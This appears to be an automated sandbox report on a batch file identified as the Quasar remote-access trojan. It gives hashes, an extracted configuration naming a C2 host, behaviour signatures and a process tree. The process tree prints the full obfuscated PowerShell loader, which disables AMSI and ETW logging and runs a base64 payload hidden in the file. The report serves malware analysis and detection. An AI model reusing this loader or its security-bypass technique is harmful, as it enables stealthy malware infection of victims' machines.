Overview

overview

10

Static

static

1

Client-built.exe.bat

windows7-x64

6

Client-built.exe.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 23:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Score
10/10
quasarfrexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + (-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFC6.tmp" "c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\CSCAEB787F0BB5349E7B5CCBF8C61A38389.TMP"
          4⤵
            PID:4596

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESBFC6.tmp
      Filesize

      1KB

      MD5

      b9bba2d809fb179993540adba01505bc

      SHA1

      d8d118f4ff81d65f45b9a4ee87d6905cd3f4a441

      SHA256

      6a4d92852b7fe4a54becffb02d31d5f2ba8675a1e593998eedea926185bc5587

      SHA512

      a04ed4a35367eaee3f8cfaad83ea6e58c92572e81eb6a9ef23bb5c50d6dddf8ddb517f4862d11d524cdfd8adf419fd0f9bae21b741aef57df4cf885dbdb3d88c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdt1vmbj.43g.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.dll
      Filesize

      8KB

      MD5

      5290ae31d21e43e604ca3294ec93c459

      SHA1

      3919e53f93061c7e3d0aed8f3da091893088680e

      SHA256

      5d287b44b2a24e797edc4742a665f1cf4266c5104d54bf536aa3829c6082d4fc

      SHA512

      a9061b004a76c72742cc3a4ba0453c317c0816bdecc3e53d7748776a1bee2c562c9503d78f1efde1d97f00b2350c1241ec145562669b39e5b95a5626a7906da3

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\CSCAEB787F0BB5349E7B5CCBF8C61A38389.TMP
      Filesize

      652B

      MD5

      5a4ec8b39ebd2d392676303be149cd14

      SHA1

      9f791e03d8499645dff0f61b497c360d01fb0235

      SHA256

      0d711297c705e52a9c7ffa6e82f82b3adec3590889fdf7e2b17d684755d2a383

      SHA512

      db157d49cbb1dcea22295252db2d80072cb4e8ce11b5952ac22c388f75fcebe8fef49ae92e53af5b1f14332645c9e386652b5b54d435b4658bcc15db5321e39b

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.0.cs
      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.cmdline
      Filesize

      369B

      MD5

      5741858b4db283db323fdc3ac09f6b94

      SHA1

      3aa932ea54aafbac75a88c68669a697aef6684d1

      SHA256

      e2cffd70771a29c1cf7407880f392c3ae075dbcca52cf6cecc38caf2529a6166

      SHA512

      7006ee786d03f3545b2fd81b0bdf87fc721b09001b498c3b50c64a5dd9cb7ef403d076ae17ca0fd05ad79ab8f3ac585bf9e67b700d5c5aa847782d1ddb64eeb4

      Download Submit

    • memory/2204-26-0x000002B61A250000-0x000002B61A258000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2204-29-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-12-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-11-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-0-0x00007FFF2B5F3000-0x00007FFF2B5F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2204-6-0x000002B67FEE0000-0x000002B67FF02000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2204-28-0x00007FFF2B5F3000-0x00007FFF2B5F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2204-13-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-30-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-31-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2204-32-0x000002B61A8A0000-0x000002B61ABC4000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/2204-33-0x000002B67FF60000-0x000002B67FFB0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2204-34-0x000002B680070000-0x000002B680122000-memory.dmp

      Filesize

      712KB

      Download

    • memory/2204-35-0x000002B680300000-0x000002B6804C2000-memory.dmp

      Filesize

      1.8MB

      Download